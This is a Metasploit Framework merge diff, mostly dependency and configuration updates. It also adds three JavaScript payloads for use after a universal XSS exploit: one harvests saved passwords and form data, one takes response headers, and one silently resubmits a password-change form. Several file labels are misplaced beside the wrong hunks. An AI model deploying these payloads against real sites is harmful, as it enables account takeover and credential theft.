Merge pull request #3 from rapid7/master

bla

Author: Pedro Ribeiro

.gitignore

@@ -13,6 +13,8 @@ Gemfile.local.lock
 .DS_Store
 # database config for testing
 config/database.yml
+# target config file for testing
+features/support/targets.yml
 # simplecov coverage data
 coverage
 doc/
@@ -50,6 +52,8 @@ tags
 
 # Rails log directory
 /log
+# Rails tmp directory
+/tmp
 
 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug

.simplecov

@@ -39,7 +39,6 @@ SimpleCov.configure do
 	# Other library groups
 	#
 
-	add_group 'Fastlib', 'lib/fastlib'
 	add_group 'Metasm', 'lib/metasm'
 	add_group 'PacketFu', 'lib/packetfu'
 	add_group 'Rex', 'lib/rex'

.travis.yml

@@ -1,6 +1,8 @@
 env:
   - RAKE_TASK=cucumber
+  - RAKE_TASK=cucumber:boot
   - RAKE_TASK=spec
+
 language: ruby
 before_install:
   - rake --version

CONTRIBUTING.md

@@ -3,13 +3,17 @@
 Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!
 
-Are you about to report a bug? If so, please use our [Redmine Bug
-Tracker](https://dev.metasploit.com/redmine/projects/framework). An
-account is required but it only takes a minute or two.
+Are you about to report a bug? Sorry to hear it.
 
-Are you about to report a security vulnerability in Metasploit?
-If so, please take a look at Rapid's [Vulnerability
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp) policy.
+Here's our [Issue tracker](https://github.com/rapid7/metasploit-framework/issues).
+Please try to be as specific as you can about your problem, include steps
+to reproduce (cut and paste from your console output if it's helpful), and
+what you were expecting to happen.
+
+Are you about to report a security vulnerability in Metasploit itself?
+How ironic! Please take a look at Rapid7's [Vulnerability
+Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
+your report to [email protected] using [our PGP key](http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D).
 
 Are you about to contribute some new functionality, a bug fix, or a new
 Metasploit module? If so, read on...
@@ -64,18 +68,14 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
 #### Bug Fixes
 
 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.
+* **Do** include a link to any corresponding [Issue](https://github.com/rapid7/metasploit-framework/issues) in the format of `See #1234` in your commit description.
 
 ## Bug Reports
 
 * **Do** report vulnerabilities in Rapid7 software directly to [email protected].
-* **Do** create a Redmine account and report your non-vulnerability bugs there.
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
 * **Don't** file duplicate reports - search for your bug before filing a new report.
-* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.
-
-Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.
 
 If you need some more guidance, talk to the main body of open
 source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)

Gemfile

@@ -6,10 +6,11 @@ gemspec
 group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
+
   # Metasploit::Credential database models
-  gem 'metasploit-credential', '>= 0.9.0'
+  gem 'metasploit-credential', '~> 0.10.1'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.19'
+  gem 'metasploit_data_models', '~> 0.20.1'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
@@ -38,7 +39,7 @@ group :development, :test do
   gem 'rspec', '>= 2.12', '< 3.0.0'
   # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
   # environment is development
-  gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
+  gem 'rspec-rails' , '>= 2.12', '< 3.0.0' 
 end
 
 group :pcap do
@@ -51,7 +52,7 @@ group :test do
   # cucumber extension for testing command line applications, like msfconsole
   gem 'aruba'
   # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails'
+  gem 'cucumber-rails', :require => false
   gem 'shoulda-matchers'
   # code coverage for tests
   # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.

Gemfile.lock

@@ -5,14 +5,15 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
+      jsobfu (~> 0.1.7)
       json
-      metasploit-model (~> 0.26.1)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.1)
       meterpreter_bins (= 0.0.7)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
       railties
-      rkelly-remix (= 0.0.6)
       robots
       rubyzip (~> 1.1)
       sqlite3
@@ -21,6 +22,9 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
+    actionmailer (3.2.19)
+      actionpack (= 3.2.19)
+      mail (~> 2.5.4)
     actionpack (3.2.19)
       activemodel (= 3.2.19)
       activesupport (= 3.2.19)
@@ -39,6 +43,9 @@ GEM
       activesupport (= 3.2.19)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
+    activeresource (3.2.19)
+      activemodel (= 3.2.19)
+      activesupport (= 3.2.19)
     activesupport (3.2.19)
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
@@ -65,10 +72,11 @@ GEM
       diff-lcs (>= 1.1.3)
       gherkin (~> 2.11.0)
       json (>= 1.4.6)
-    cucumber-rails (1.3.0)
+    cucumber-rails (1.4.0)
       capybara (>= 1.1.2)
-      cucumber (>= 1.1.8)
+      cucumber (>= 1.2.0)
       nokogiri (>= 1.5.0)
+      rails (>= 3.0.0)
     diff-lcs (1.2.5)
     erubis (2.7.0)
     factory_girl (4.4.0)
@@ -83,28 +91,37 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
+    jsobfu (0.1.7)
+      rkelly-remix (= 0.0.6)
     json (1.8.1)
-    metasploit-concern (0.1.1)
+    mail (2.5.4)
+      mime-types (~> 1.16)
+      treetop (~> 1.4.8)
+    metasploit-concern (0.2.1)
       activesupport (~> 3.0, >= 3.0.0)
-    metasploit-credential (0.9.0)
-      metasploit-concern (~> 0.1.0)
-      metasploit-model (~> 0.26.1)
-      metasploit_data_models (~> 0.19.4)
+      railties (< 4.0.0)
+    metasploit-credential (0.10.1)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.0)
+      metasploit_data_models (~> 0.20.0)
       pg
+      railties (< 4.0.0)
       rubyntlm
       rubyzip (~> 1.1)
-    metasploit-model (0.26.1)
+    metasploit-model (0.27.1)
       activesupport
-    metasploit_data_models (0.19.4)
+      railties (< 4.0.0)
+    metasploit_data_models (0.20.1)
       activerecord (>= 3.2.13, < 4.0.0)
       activesupport
       arel-helpers
-      metasploit-concern (~> 0.1.0)
-      metasploit-model (~> 0.26.1)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.0)
       pg
+      railties (< 4.0.0)
     meterpreter_bins (0.0.7)
     method_source (0.8.2)
-    mime-types (2.3)
+    mime-types (1.25.1)
     mini_portile (0.6.0)
     msgpack (0.5.8)
     multi_json (1.0.4)
@@ -114,6 +131,7 @@ GEM
     packetfu (1.1.9)
     pcaprub (0.11.3)
     pg (0.17.1)
+    polyglot (0.3.5)
     pry (0.10.0)
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
@@ -125,6 +143,14 @@ GEM
       rack
     rack-test (0.6.2)
       rack (>= 1.0)
+    rails (3.2.19)
+      actionmailer (= 3.2.19)
+      actionpack (= 3.2.19)
+      activerecord (= 3.2.19)
+      activeresource (= 3.2.19)
+      activesupport (= 3.2.19)
+      bundler (~> 1.0)
+      railties (= 3.2.19)
     railties (3.2.19)
       actionpack (= 3.2.19)
       activesupport (= 3.2.19)
@@ -174,7 +200,10 @@ GEM
     thor (0.19.1)
     tilt (1.4.1)
     timecop (0.7.1)
-    tzinfo (0.3.40)
+    treetop (1.4.15)
+      polyglot
+      polyglot (>= 0.3.1)
+    tzinfo (0.3.41)
     xpath (2.0.0)
       nokogiri (~> 1.3)
     yard (0.8.7.4)
@@ -189,9 +218,9 @@ DEPENDENCIES
   factory_girl (>= 4.1.0)
   factory_girl_rails
   fivemat (= 1.2.1)
-  metasploit-credential (>= 0.9.0)
+  metasploit-credential (~> 0.10.1)
   metasploit-framework!
-  metasploit_data_models (~> 0.19)
+  metasploit_data_models (~> 0.20.1)
   network_interface (~> 0.0.1)
   pcaprub
   pg (>= 0.11)

LICENSE

@@ -87,10 +87,6 @@ Files: lib/bit-struct.rb lib/bit-struct/*
 Copyright: 2005-2009, Joel VanderWerf
 License: Ruby
 
-Files: lib/fastlib.rb
-Copyright: 2011, Rapid7, Inc.
-License: Ruby
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1

Rakefile

@@ -9,8 +9,8 @@ module Metasploit::Credential::Core::ToCredential
 
     def to_credential
       Metasploit::Framework::Credential.new(
-        public:       public.try(:username), 
-        private:      private.try(:data), 
+        public:       public.try(:username) || '',
+        private:      private.try(:data)    || '',
         private_type: private.try(:type).try(:demodulize).try(:underscore).try(:to_sym), 
         realm:        realm.try(:value), 
         realm_key:    realm.try(:key),

app/concerns/metasploit/credential/core/to_credential.rb

@@ -2,7 +2,9 @@
 rerun = File.file?('rerun.txt') ? IO.read('rerun.txt') : ""
 rerun_opts = rerun.to_s.strip.empty? ? "--format #{ENV['CUCUMBER_FORMAT'] || 'progress'} features" : "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} #{rerun}"
 std_opts = "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} --strict --tags ~@wip"
+ignored_tags = "--tags ~@boot --tags ~@targets"
 %>
-default: <%= std_opts %> features
+default: <%= std_opts %> <%= ignored_tags %> features
+boot: <%= std_opts %> --tags @boot features
 wip: --tags @wip:3 --wip features
 rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip

config/cucumber.yml

@@ -0,0 +1,33 @@
+/* steal_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal any autofilled inputs, saved passwords, or any */
+/* data entered into a form.                                       */
+
+/* keep track of what input fields we have discovered */
+var found = {};
+setInterval(function(){
+  /* poll the DOM to check for any new input fields */
+  var inputs = document.querySelectorAll('input,textarea,select');
+  Array.prototype.forEach.call(inputs, function(input) {
+    var val  = input.value||'';
+    var name = input.getAttribute('name')||'';
+    var t    = input.getAttribute('type')||'';
+    if (input.tagName == 'SELECT') {
+      try { val = input.querySelector('option:checked').value }
+      catch (e) {}
+    }
+    if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
+
+    /* check if this is a valid input/value pair */
+    try {
+      if (val.length && name.length) {
+        if (found[name] != val) {
+
+          /* new input/value discovered, remember it and send it up */
+          found[name] = val;
+          var result = { name: name, value: val, url: window.location.href, send: true };
+          (opener||top).postMessage(JSON.stringify(result), '*');
+        }
+      }
+    } catch (e) {}
+  });
+}, 200);

data/exploits/uxss/steal_form.js

@@ -0,0 +1,17 @@
+/* steal_headers.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal the response headers of the loaded URL.           */
+
+/* send an XHR request to our current page */
+var x = new XMLHttpRequest;
+x.open('GET', window.location.href, true);
+x.onreadystatechange = function() {
+  /* when the XHR request is complete, grab the headers and send them back */
+  if (x.readyState == 2) {
+    (opener||top).postMessage(JSON.stringify({
+      headers: x.getAllResponseHeaders(),
+      url: window.location.href,
+      send: true
+    }), '*');
+  }
+};
+x.send();

data/exploits/uxss/steal_headers.js

@@ -0,0 +1,36 @@
+/* submit_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to modify and submit a form in the target page.          */
+
+/* modify this hash to your liking */
+var formInfo = {
+
+  /* CSS selector for the form you want to submit */
+  selector: 'form[action="/update_password"]',
+
+  /* inject values into some input fields */
+  inputs: {
+    'user[new_password]': 'pass1234',
+    'user[new_password_confirm]': 'pass1234'
+  }
+}
+
+var c = setInterval(function(){
+  /* find the form... */
+  var form = document.querySelector(formInfo.selector);
+  if (!form) return;
+
+  /* loop over every input field, set the value as specified. */
+  Array.prototype.forEach.call(form.elements, function(input) {
+    var inject = formInfo.inputs[input.name];
+    if (inject) input.setAttribute('value', inject);
+  });
+
+  /* submit the form and clean up */
+  form.submit();
+  clearInterval(c);
+
+  /* report back */
+  var message = "Form submitted to "+form.getAttribute('action');
+  var url = window.location.href;
+  (opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
+}, 100);